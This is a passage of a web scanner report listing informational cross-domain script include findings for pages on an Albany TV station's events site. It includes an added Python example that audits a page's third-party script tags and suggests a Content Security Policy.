Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:46:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 106
ETag: "f3c8f98af0ea3082246620bf2df25b2b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:46:08 GMT; HttpOnly
Content-Length: 42611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.181. http://events.cbs6albany.com/clifton-park-ny/events/show/164348085-bring-me-the-horizon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /clifton-park-ny/events/show/164348085-bring-me-the-horizon

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /clifton-park-ny/events/show/164348085-bring-me-the-horizon HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:45:39 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 142
ETag: "e107b0d5c2345a2676e407a1a48662f7"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:45:39 GMT; HttpOnly
Content-Length: 44598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.182. http://events.cbs6albany.com/clifton-park-ny/venues/show/11456-northern-lights

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /clifton-park-ny/venues/show/11456-northern-lights

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /clifton-park-ny/venues/show/11456-northern-lights HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:46:43 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 95
ETag: "7fca35bd43ff833b123c97ee72367ebe"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:46:43 GMT; HttpOnly
Content-Length: 53686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.183. http://events.cbs6albany.com/glens-falls-ny/events/show/164377145-tna-wrestling-live

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /glens-falls-ny/events/show/164377145-tna-wrestling-live

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /glens-falls-ny/events/show/164377145-tna-wrestling-live HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 121
ETag: "f1bbe642a45c56f858eefe9227d076d3"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:13 GMT; HttpOnly
Content-Length: 46066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.184. http://events.cbs6albany.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /glens-falls-ny/venues/show/185044-glens-falls-civic-center

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /glens-falls-ny/venues/show/185044-glens-falls-civic-center HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 85
ETag: "ed30ecb6059f5d05bc4f5fc8e9a3d47b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:13 GMT; HttpOnly
Content-Length: 59946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
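Every finding in this group (18.184 through 18.194) is the same observation: the page executes JavaScript fetched from hosts it does not control, over plain http, with no Subresource Integrity hash, so whoever controls those hosts (or the network path to them) controls the page's DOM, cookies readable from script, and every form on it. The hosts named in the "Issue detail" list are not reproduced in this copy of the report, but four are visible in the script tags of each captured response: js.zvents.com, onset.freedom.com, common.onset.freedom.com and edge.quantserve.com. The script below is an added example, not the crawler's code and not anything from events.cbs6albany.com; it re-derives that finding from a response body. The sample body is constructed from the tags shown in the snippet above plus one hypothetical same-origin script (/javascripts/site.js) so the same-origin filter has something to drop; the page URL is the one from this finding.

```python
import html
import re
from urllib.parse import urljoin, urlsplit

# Constructed sample: the <script src> tags visible in the captured response
# above for events.cbs6albany.com, plus one hypothetical same-origin script
# (/javascripts/site.js). The real body is cut at "[SNIP]" in the report, so
# the live page may load more scripts than these.
SAMPLE_HTML = """
<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<script type="text/javascript" src="/javascripts/site.js"></script>
"""

# Opening <script ...> tags only; "</script>" does not match "<script\b".
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
# name="value", name='value' or name=value; valueless attributes are ignored.
ATTR_RE = re.compile(
    r"""([A-Za-z_:][-A-Za-z0-9_:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))"""
)


def _attrs(tag):
    """Attribute name -> unescaped value for one opening tag (names lower-cased)."""
    out = {}
    for m in ATTR_RE.finditer(tag):
        value = next(v for v in m.groups()[1:] if v is not None)
        out[m.group(1).lower()] = html.unescape(value)
    return out


def _origin(url):
    """(scheme, host, port), the tuple a browser's same-origin check compares."""
    u = urlsplit(url)
    return (u.scheme.lower(), (u.hostname or "").lower(), u.port)


def cross_domain_scripts(page_url, body):
    """One record per <script src> fetched from an origin other than page_url's.

    Each record carries the properties that decide how much trust the include
    implies: plain http (the script can be swapped in transit), no SRI hash
    (the host can change the script at will) and no crossorigin attribute.
    """
    page_origin = _origin(page_url)
    records = []
    for m in SCRIPT_TAG_RE.finditer(body):
        attrs = _attrs(m.group(0))
        src = attrs.get("src")
        if not src:
            continue  # inline script, not an include
        abs_url = urljoin(page_url, src)  # resolve a relative src against the page
        origin = _origin(abs_url)
        if origin == page_origin:
            continue  # same origin: not a third-party dependency
        records.append({
            "scheme": origin[0],
            "host": origin[1],
            "url": abs_url,
            "plain_http": origin[0] == "http",
            "has_integrity": "integrity" in attrs,
            "has_crossorigin": "crossorigin" in attrs,
        })
    return records


def third_party_hosts(page_url, body):
    """Sorted, de-duplicated list of hosts the page executes script from."""
    return sorted({r["host"] for r in cross_domain_scripts(page_url, body)})


def unpinned(page_url, body):
    """Cross-origin scripts that carry no Subresource Integrity hash."""
    return [r["url"] for r in cross_domain_scripts(page_url, body) if not r["has_integrity"]]


def suggested_script_src(page_url, body):
    """A starting CSP script-src directive that allows exactly the observed hosts."""
    sources = sorted({f"{r['scheme']}://{r['host']}" for r in cross_domain_scripts(page_url, body)})
    return "script-src 'self' " + " ".join(sources)


if __name__ == "__main__":
    page = "http://events.cbs6albany.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center"
    for r in cross_domain_scripts(page, SAMPLE_HTML):
        print(f"{r['host']:26} plain_http={r['plain_http']!s:5} sri={r['has_integrity']!s:5} {r['url']}")
    print(suggested_script_src(page, SAMPLE_HTML))
```

Two caveats for anyone turning this into a fix. A CSP script-src allow-list only limits which hosts may serve script; it does nothing if an allow-listed host is compromised, which is the scenario the finding is about. Subresource Integrity closes that gap but only for scripts whose bytes are fixed, and the analytics loader here is requested with per-page query parameters and is presumably generated on the fly, so it cannot be pinned without the vendor's cooperation. Note also the tag whose src ends in `%7C" + z_page_type + "&usetitle=true"`: that reads like JavaScript string concatenation emitted into an HTML attribute, and the parser above, like a browser, takes the src value up to the closing quote and discards the rest.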

18.185. http://events.cbs6albany.com/menands-ny/events/show/163979825-sweetheart-breakfast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /menands-ny/events/show/163979825-sweetheart-breakfast

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /menands-ny/events/show/163979825-sweetheart-breakfast HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 178
ETag: "af94f516d7c06edb567439cabe37de79"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:29 GMT; HttpOnly
Content-Length: 37424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.186. http://events.cbs6albany.com/movies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
